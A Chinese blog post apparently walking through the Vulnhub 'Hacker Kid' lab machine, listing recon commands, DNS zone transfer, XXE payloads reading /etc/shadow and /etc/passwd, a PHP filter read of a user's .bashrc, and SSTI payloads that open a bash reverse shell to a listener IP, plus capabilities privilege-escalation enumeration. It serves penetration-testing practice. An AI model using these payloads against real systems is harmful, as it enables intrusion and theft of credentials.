hackerkid靶机之DNS区域传输、XXE注入攻击、PHP封装器、SSTI模板注入、Capabilitie提权

于 2023-05-18 15:49:29 发布
阅读量171 收藏
点赞数
文章标签: php linux 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40898302/article/details/130748642
版权

靶机地址:https://download.vulnhub.com/hackerkid/Hacker_Kid-v1.0.1.ova

难度等级:中

打靶目标:取得 root 权限

涉及攻击方法:

  • 主机发现
  • 端口扫描
  • WEB信息收集
  • DNS区域传输
  • XXE注入攻击
  • PHP封装器
  • SSTI模板注入
  • Capabilitie提权

 参考:

XXE Payload:

<!ENTITY file SYSTEM "file:///etc/shadow">

SSTI Payloas:

name={% import os %}{{os.system('bash -c "bash -i >& /dev/tcp/10.0.2.7/4444 0>&1"')}}

%7B%25%20import%20os%20%25%7D%7B%7Bos.system%28%27bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.0.2.7%2F4444%200%3E%261%22%27%29%7D%7D

CAPABILITIES:​​​​​​capabilities(7) - Linux manual page

主机发现:

arp-scan -I eth0 -l

版本扫描:

nmap -p53,80,9999 -sV 172.20.10.6

UDP扫描:

nmap -p53 -sU 172.20.10.6

DNS域传输:

dig axfr @172.20.10.6 blackhat.local

XXE:

<!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]> &xxe;

php封装器读取

<!DOCTYPE foo [<!ENTITY xxe SYSTEM 'php://filter/convert.base64-encode/resource=/home/saket/.bashrc'>]>

模板注入弹shell

万能检测payload

{{1+zbcxyz}}${1+zbcxyz}[1+zbcxyz]

${7*7}{{7*7}}

模板注入-python

{% import os %}{{os.system('bash -c "bash -i >& /dev/tcp/172.20.10.4/4444 0>&1"')}}

ascil 编码

{% import os %}{{os.system('bash -c "bash -i >& /dev/tcp/172.20.10.4/4444 0>&1"')}}

为:

%7B%25%20import%20os%20%25%7D%7B%7Bos.system%28%27bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.20.10.4%2F4444%200%3E%261%22%27%29%7D%7D

Capabilities提权

查询Capabilities权限

/sbin/getcap -r /2>dev/null

查询以root运行的程序

ps -aef | grep root

进入/tmp

下载python的利用脚本

wget

Capabilities提权步骤自行在网上查找哈。

白冷
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
利用capabilities提权(setuid、cap_setuid)
墨痕诉清风的博客
08-21 1716
从而,在实际进行特权操作时,如果euid不是root,便会检查是否具有该特权操作所对应的capabilities,并以此为依据,决定是否可以执行特权操作。我们运行SUID的命令时,通常只是需要使用一小部分特权,但是使用SUID,却可以拥有root用户的全部权限。当然,Permitted集合默认是不能增加新的capabilities的,除非CAP_SETPCAP在Effective集合中。每一个线程,具有3个capabilities的集合,每个集合中,可以包含零个或多个capabilities。...
Capabilities位提权
m0_57221101的博客
04-02 1578
linux2.2之后,产生了Capabilities用于分隔root权限,以便于用户更好,更安全,更精细的管理机的功能和权限。 具体的相关与capabilities的使用方面知识可以去参考这篇文章Linux Capabilities 简介 - sparkdev - 博客园 (cnblogs.com) 这里仅讨论对提权有帮助的CAP_SETUID标志 操作 首先需要探查有CAP_SETUID标志的进程 /usr/sbin/getcap -r / 2>/dev/null 这样来找到进程
linux系统利用可执行文件的Capabilities实现权限提升
whatday的专栏
10-25 2758
一、操作目的和应用场景 Capabilities机制是在Linux内核2.2之后引入的,原理很简单,就是将之前与超级用户root(UID=0)关联的特权细分为不同的功能组,Capabilites作为线程(Linux并不真正区分进程和线程)的属性存在,每个功能组都可以独立启用和禁用。其本质上就是将内核调用分门别类,具有相似功能的内核调用被分到同一组中。 这样一来,权限检查的过程就变成了:在执行特权操作时,如果线程的有效身份不是root,就去检查其是否具有该特权操作所对应的capabilities,并以此为
Capadlities提权
weixin_51151193的博客
12-29 582
Capadlities提权操作
java sql解析_漏洞经验分享丨Java审计之XXE(下)
weixin_39620334的博客
11-29 145
上篇内容我们介绍了XXE的基础概念和审计函数的相关内容,今天我们将继续分享Blind XXE与OOB-XXE的知识点以及XXE防御方法,希望对大家的学习有所帮助! 上期回顾 ◀漏洞经验分享丨Java审计之XXE(上)Blind XXEBlind XXE与OOB-XXE一般XXE利用分为两大场景:有回显和无回显。有回显的情况可以直接在页面中看到Payload的执行结果或现象(带内XML外部实体(XX...
crasher.tar(DC3靶机所需提权exp-2)
02-20
DC3靶机所需提权exp
exploit.tar(DC3靶机所需提权exp-1)
02-20
39772.zip
sqli-labs-master-注入学习靶机
01-19
这个靶机教程由印度开发者创建,旨在帮助用户掌握SQL注入攻击的不同类型,以及如何使用工具如sqlmap进行自动化检测和利用。SQLmap是一个流行的开源渗透测试工具,专门用于检测和利用SQL注入漏洞。通过`sqli-labs`,...
65.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1
08-03
【网络安全自学篇】六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1 本文主要讲述了网络安全中的靶机渗透技术,特别是通过Vulnhub平台进行环境搭建和JIS-CTF挑战。Vulnhub是一个提供虚拟机...
Vulnhub靶场——Hacker_Kid-v1.0.1
Re1_zf的博客
10-10 1052
这里需要用到一个提权脚本,这个脚本的作用就是对root权限的进程注入python类型shellcode,利用python具备的cap_sys_ptrace+ep能力实现权限提升。此脚本如果执行成功,会在靶机本地监听5600端口,不过也可以修改脚本shellcode部分使其监听其他端口。搜索后发现,9999端口开放的一般是tornado服务,是一个python的web服务框架。前面访问的9999端口是一个登录页面,也许有用,拿去尝试登录一下。给name变量赋值会有回显,后端的变量应该就是name。
写bat脚本双击执行
qq_35911118的博客
04-08 2828
@echo off           不显示后续命令行及当前命令行 dir c:*.* >a.txt       将c盘文件列表写入a.txt call c:\ucdos\ucdos.bat    调用ucdos echo 你好            显示"你好" pause              暂停,等待按键继续 rem 准备运行wps         注释:准备运行wps cd ucdos            进入ucdos目录 wps               运行wps @echo
Hack The Box - Redpanda 利用Spring Boot SSTI漏洞获取初始访问权限,Linux系统内核漏洞(CVE-2022-2588)提权XXE漏洞获取root私钥
最新发布
Zyu0
12-02 1272
Hack The Box - Redpanda 利用Spring Boot SSTI漏洞获取初始访问权限,Linux系统内核漏洞(CVE-2022-2588)提权,XML外部实体(XXE)注入提权
windows文件读取 xxe_XXE原理及利用
weixin_35387118的博客
12-21 1260
“一个人的伟大之处乃在于他是一座桥梁,而不是目的。By尼采”一XXE原理01XML 简介XML 指可扩展标记语言(EXtensible Markup Language),和HTML很类似,但XML的设计目的是传输数据而非显示数据,且XML没有预定义的标签,因此需要自行定义标签。下面是一个XML文档的实例。GeorgeJohnReminderDon't forget the meeting...
XXE漏洞以及Blind XXE总结
热门推荐
Exploit的小站~
05-10 5万+
 转载请注明出处:http://blog.csdn.net/u011721501 0、前言 XXE漏洞是针对使用XML交互的Web应用程序的攻击方法,在XEE漏洞的基础上,发展出了BlindXXE漏洞。目前来看,XML文件作为配置文件(Spring、Struts2等)、文档结构说明文件(PDF、RSS等)、图片格式文件(SVGheader)应用比较广泛,此外,网上有一些在线XML格式...
网络安全课第五节 XXE 漏洞的检测与防御
fegus的博客
07-11 1529
上一讲我们介绍了 SSRF 漏洞,一种专门针对服务端的请求伪造攻击,常被用于攻击内网。在里面我介绍了 Burp Collaborator 用于专门测试无回显漏洞的功能,在本讲的 XXE 漏洞测试中,我们依然可以使用,不知道你是否还记得怎么使用?下面,我们就开始今天的课程,一场关于 XML 外部实体注入XXE)漏洞的攻防之路。XXE(XML External Entity,XML 外部实体注入)正是当允许引用外部实体时,通过构造恶意内容,导致读取任意文件、执行系统命令、内网探测与攻击等危害的一类漏洞。PHP
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值